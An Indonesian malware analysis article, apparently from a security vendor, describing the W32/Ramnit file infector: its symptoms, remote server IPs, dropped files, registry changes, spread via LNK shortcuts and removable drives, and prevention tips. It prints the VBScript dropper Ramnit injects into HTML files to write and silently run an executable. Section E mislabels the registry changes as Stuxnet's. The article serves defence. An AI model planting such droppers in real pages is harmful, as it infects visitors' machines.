W32/Ramnit, Kini dengan kemampuan eksploitasi LNK
(Shortcut)
Kalau Christiano Ronaldo di ibaratkan sebagai
Stuxnet, tentu anda bertanya virus apa yang diibaratkan sebagai Messi ?
Jawabannya adalah Ramnit. Walaupun tidak eksplosif seperti Stuxnet, namun dengan
kemampuan yang tidak kalah dengan Stuxnet dalam injeksi file korbannya, Ramnit
jelas menginfeksi banyak komputer di Indonesia dan pelan tapi pasti mengokohkan
dirinya sebagai salah satu virus jawara yang pelru diwaspadai oleh pengguna
komputer di Indonesia. Apalagi varian teranyar Ramnit yang sekarang memiliki
kemampuan mengeksploitasi celah keamanan LNK (Shortcut) sehingga ia mampu
menyebarkan dirinya dengan membuat Shortcut.
Di tahun 2010 lalu, dominasi stuxnet yang
memanfaatkan celah keamanan LNK (shortcut) merupakan sebuah salah satu langkah
kerja cerdas dari pembuat malware. Bukan hanya
sekedar mendominasi, tetapi juga menjadi trending topik malware di berbagai
artikel dan analisis di seluruh dunia.
Di saat dominasi stuxnet masih booming hingga saat
ini, sebaiknya kita perlu waspada pula terhadap varian malware baru yang
berusaha menunjukkan eksistensi-nya dengan usaha kerja keras dari pembuat
malware. Diantara varian malware yang patut di waspadai adalah yang terdeteksi
sebagai W32/Ramnit oleh Norman Security Suite. Saat ini varian malware
ramnit telah menyebar dengan cepat di seluruh dunia. Serangan ramnit ikut
melengkapi dominasi malware mancanegara yang menyebar di Indonesia.
A.Keluarga malware W32/Ramnit
Malware ramnit sesungguhnya bukanlah kelompok
malware yang baru, melainkan sudah aktif menyebar pula di tahun 2010. Hanya
karena adanya malware pengguna celah keamanan LNK seperti shortcut, sality,
stuxnet, yang membuat malware ini tidak menjadi perhatian para analisis dan
pengguna komputer di dunia.
Sama seperti stuxnet, varian pertama W32/Ramnit
muncul pada pertengahan Juli dan Agustus 2010. Sedangkan varian kedua
W32/Ramnit muncul pada Oktober dan Nopember 2010, bersamaan dengan heboh-nya
serangan sality-shortcut. Dan pada pertengahan Januari 2011 saat ini yang
muncul adalah varian ketiga dari keluarga W32/Ramnit yang mencoba mengikuti
jejak para pendahulunya dengan menggunakan celah keamanan LNK (shortcut) untuk
melakukan infeksi dan penyebaran.
B.Karakteristik W32/Ramnit
Salah satu hal yang membuat kita perlu hati-hati
terhadap W32/Ramnit yaitu karena malware ini termasuk kelompok virus yang
melakukan infeksi file seperti Sality, Virut dan Alman. Hal ini bisa menjadi
momok buat pengguna komputer, karena akan sulit membersihkan virus yang melakukan
infeksi file terutama file executable (application).
W32/Ramnit merupakan salah satu varian virus yang
melakukan infeksi file executable (application). Dan tidak hanya file
executable, tetapi juga melakukan infeksi terhadap file web (HTML) dan file DLL
(dynamic link library).
Selain itu, jika anda terhubung ke internet, ramnit
akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa
alamat server zombie untuk mendownload sekumpulan malware (virus, trojan,
spyware). Pada beberapa waktu tertentu, W32/Ramnit menggunakan iklan dan popup
dengan konten pornografi dan perjudian (casino) maupun iklan komersial lain
yang tentunya membuat anda tidak nyaman saat hendak browsing maupun surfing.
Bayangkan kalau hal ini terjadi pada saat anak anda yang dibawah umur sedang
menggunakan komputer yang anda proteksi dengan Parental Control. Bagi orang tua
ini bencana karena anak anda terpapar pornografi (karena kemungkinan besar
konten porno yang ditampilkan akan lolos dari Parental Control yang di pasang)
dan bagi anak hal ini bisa-bisa dianggap "berkah" karena proteksi
pornografi yang di pasang ternyata bisa diakali.
Dengan turut memanfaatkan celah keamanan LNK
(shortcut), maka makin mempermudah langkahnya untuk menginfeksi pengguna
komputer dengan cepat. Walaupun tidak semua varian ketiga W32/Ramnit
menggunakan celah keamanan LNK (shortcut), tetapi hampir semua varian
W32/Ramnit akan sangat sulit dibersihkan.
C.Gejala & Efek W32/Ramnit
Beberapa gejala yang terjadi jika anda sudah
terinfeksi yaitu :
1.Muncul pop-up iklan atau pop-up
dengan konten pornografi/perjudian
Dalam beberapa waktu tertentu, browser akan membuka
pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (casino).
Hal ini yang terkadang membuat pengguna komputer
menjadi tidak nyaman.
2.Muncul script error atau pop-up
error setelah pop-up iklan yang muncul
Setelah pop-up iklan yang muncul, akan muncul
pop-up error atau script error dari browser. Muncul-nya script error ini mirip
seperti virus "ARP Spoofing" pada tahun 2008.
3.Infeksi file EXE dan DLL
Sama seperti varian malware sality, alman dan
virut, W32/Ramnit melakukan infeksi file exe. Hanya saja, W32/Ramnit juga
melakukan infeksi terhadap file DLL (dynamic load library).
File exe dan dll yang di-infeksi bertambah sekitar
antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun
begitu, tidak semua file exe dan dll yang di-infeksi.
4.Injeksi file HTML
Selain menginfeksi file exe dan dll, W32/Ramnit
juga melakukan injeksi terhadap file HTML. Injeksi dilakukan dengan menambahkan
pada header dan footer.
Pada header, W32/Ramnit menambahkan script :
DropFileName = "svchost.exe"
Sedangkan pada footer, W32/Ramnit menambahkan
script :
Set FSO = CreateObject
("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\"
DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" &
Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject
("Wscript.shell")
WSHshell.Run DropPath, 0
5.Membuat fungsi services Windows
menjadi blank
Dengan aksi melakukan injeksi file pada file
IEXPLORE.EXE dan file services.exe, serta menambahkan script pada file web
(htm/html) membuat fungsi dari services Windows menjadi blank.
6.Membuat komputer hang/lambat
dan bahkan koneksi jaringan menjadi terputus.
File sistem Windows yang akan menjadi sasaran
injeksi W32/Ramnit yaitu :
C:\WINDOWS\system32\svchost.exe (file sistem yang
berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan
terputus)
C:\WINDOWS\system32\lsass.exe
(file sistem yang berhubungan dengan aktifitas komputer, dengan menginjeksi
akan membuat komputer hang/lambat).
C:\WINDOWS\system32\services.exe
(file sistem yang berhubungan dengan services dan driver yang berjalan)
C:\Program Files\Internet
Explorer\IEXPLORE.EXE (file executable dari browser internet explorer)
7.Aktif pada proses memory
Malware W32/Ramnit mencoba melakukan koneksi ke
Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa
kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE /
Internet Explorer.
8.Melakukan koneksi ke Remote Server
Malware W32/Ramnit melakukan koneksi ke Remote
Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server.
Remote Server yang digunakan yaitu diantara-nya :
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
9.Melakukan transfer data ke Remote
Server
Selain mencoba melakukan koneksi dan ber-komunikasi
dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari
komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam
komputer korban.
10.Melakukan broadcast
Sama seperti hal-nya worm Conficker, W32/Ramnit
juga melakukan broadacast pada jaringan. Yang ber-beda adalah untuk W32/Ramnit
hanya melakukan pada satu alamat yaitu : ADX.ADNXS.COM
D.File virus W32/Ramnit
Malware W32/Ramnit dibuat menggunakan bahasa
pemrograman C yang dikompres menggunakan UPX. File malware memiliki ciri
sebagai berikut :
§ Berukuran 105 kb
§ Type file "Application'
§ Menggunakan icon "folder music"
§ Extension "exe"
Saat W32/Ramnit dijalankan, maka akan menginjeksi
beberapa file sistem Windows yaitu :
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\services.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
Jika terkoneksi ke internet,
W32/Ramnit akan mendownload beberapa file dan folder malware sebagai berikut :
C:\Documents and Settings\%user%\Local
Settings\Temp\[angka].tmp
C:\Documents and Settings\%user%\Local
Settings\Temp\explorer.dat
C:\Documents and Settings\%user%\Local
Settings\Temp\winlogon.dat
C:\Documents and Settings\%user%\Local
Settings\Temp\[nama_acak].exe
C:\Documents and Settings\%user%\Start
Menu\Programs\[nama_acak].exe
C:\Program Files\Intenet Explorer\complete.dat
C:\Program Files\Intenet Explorer\dmlconf.dat
C:\Program Files\win\[angka_acak].exe
C:\Program Files\qwe
C:\WINDOWS\[nama_acak].exe
C:\WINDOWS\System32\[nama_acak].dll
C:\WINDOWS\System32\[nama&angka_acak].dll
C:\WINDOWS\Temp\[angka].tmp
Selain itu, W32/Ramnit melakukan injeksi terhadap
beberapa file berikut (jika ada) yaitu :
C:\contacts.html
C:\Inetpub\wwwroot\index.html
C:\Program Files\Common Files\designer\MSADDNDR.DLL
C:\Program Files\Common Files\designer\MSHTMPGD.DLL
C:\Program Files\Common Files\designer\MSHTMPGR.DLL
C:\Program Files\Common
Files\System\ado\MDACReadme.htm
C:\Program Files\Common Files\System\Ole
DB\MSDAIPP.DLL
C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
C:\Program Files\MSN\MSNIA\custdial.dll
C:\Program Files\MSN\MSNIA\msniasvc.exe
C:\Program Files\MSN\MSNIA\prestp.exe
C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
C:\Program Files\MSN\MsnInstaller\msdbxi.dll
C:\Program Files\MSN\MsnInstaller\msninst.dll
C:\Program Files\MSN\MsnInstaller\msninst.exe
C:\Program Files\MSN\MsnInstaller\msnsign.dll
C:\Program Files\NetMeeting\netmeet.htm
Selain itu pada removable disk/drive akan membuat
beberapa file yaitu :
autorun.inf
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak1].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak2].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak3].exe
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak4].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak5].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak6].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak7].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak8].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak9].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak10].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak11].exe
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak1].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak2].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak3].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak4].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak5].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak6].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak7].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak8].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak9].cpl
<Rem. Drive :>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak10].cpl
<Rem. Drive
:>\RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak11].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak1].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak2].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak3].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak4].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak5].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak6].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak7].exe
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak1].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak2].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak3].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak4].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak5].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak6].cpl
<Rem. Drive
:>\RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak7].cpl
Serta pada jaringan yang menggunakan mapping drive,
berusaha menginjeksi beberapa file yang
memiliki nama berikut :
Blank.htm
Citrus Punch.htm
Clear Day.htm
Fiesta.htm
Ivy.htm
Leaves.htm
Maize.htm
Nature.htm
Network Blitz.htm
Pie Charts.htm
Sunflower.htm
Sweets.htm
Technical.htm
E.Modifikasi Registry
Beberapa modifikasi registry yang dilakukan oleh
worm Stuxnet antara lain sebagai berikut :
-Menambah Registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and
Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet
Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet
Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet
Explorer\international
-Menghapus Registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SystemRestore]
DisableSR = 0x00000001
-Merubah Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3]
CurrentLevel =
1601 =
F.Metode Penyebaran
Beberapa cara W32/Ramnit melakukan penyebaran yaitu
sebagai berikut :
-Drive by download (exploit)
W32/Ramnit awalnya menyebar dengan memanfaatkan
fitur drive by download pada system Windows. Dengan link-link yang tersebar
pada forum atau e-mail, berusaha mengelabui user untuk menjalankan link
tersebut. Selain itu juga saat akses pada website-website yang menyediakan
konten atau plugin browser untuk di-download.
-Removable drive/disk
Metode ini adalah metode yang umum dilakukan oleh
para pengguna komputer. W32/Ramnit membuat banyak file agar menginfeksi
komputer, serta ikut pula memanfaatkan celah keamanan LNK (shortcut).
-Jaringan
W32/Ramnit berusaha melakukan injeksi terhadap
beberapa file web (htm) tertentu di jaringan pada komputer yang melakukan
mapping drive. Berikut file-file tersebut :
Blank.htm
Citrus Punch.htm
Clear Day.htm
Fiesta.htm
Ivy.htm
Leaves.htm
Maize.htm
Nature.htm
Network Blitz.htm
Pie Charts.htm
Sunflower.htm
Sweets.htm
Technical.htm
G.Tips Pencegahan dari Malware
W32/Ramnit
§
Aktifkan Windows Firewall atau gunakan software firewall yang lain. Hal
ini untuk mencegah dari akses yang tidak di-inginkan
§ Pastikan komputer sudah mendapatkan update terbaru
dari system Windows. Untuk mempermudah gunakan update otomatis dari system
seperti "Automatic Updates". Atau bisa juga dengan men-download patch
terbaru dari website Microsoft.
§ Gunakan antivirus yang selalu terupdate dengan
baik. Hal ini untuk mempermudah terhadap varian-varian dari malware yang baru.
§ Batasi akses terhadap akses administrator. Bagi pengguna Windows 7 dan
Vista, pastikan UAC (User Account Control) telah berjalan dengan baik.
§ Berhati-hati saat membuka file attachment e-mail atau saat menerima
transfer file dari orang yang tidak dikenal. Pastikan selalu di scan dengan
antivirus yang terupdate.
§ Berhati-hati terhadap program crack/keygen atau program-program yang
tidak dikenal. Karena bisa saja sudah terinfeksi atau mengandung malware.
§ Gunakan password yang tidak mudah dibaca dan diketahui. Pastikan selalu
rubah password pada waktu-tertentu, dan bedakan password satu dengan lain-nya.
§ Matikan fitur "autoplay" Windows untuk mencegah program yang
tidak diinginkan pada removable drive/disk berjalan secara otomatis
§ Matikan file sharing jika tidak digunakan. Jika memang menggunakan file
sharing hanya berstatus read-only, atau konfigurasi sharing hanya untuk
user-user tertentu.
§ Berhati-hati saat mengakses sebuah website atau forum yang menyediakan
link-link tertentu untuk di-download atau di-install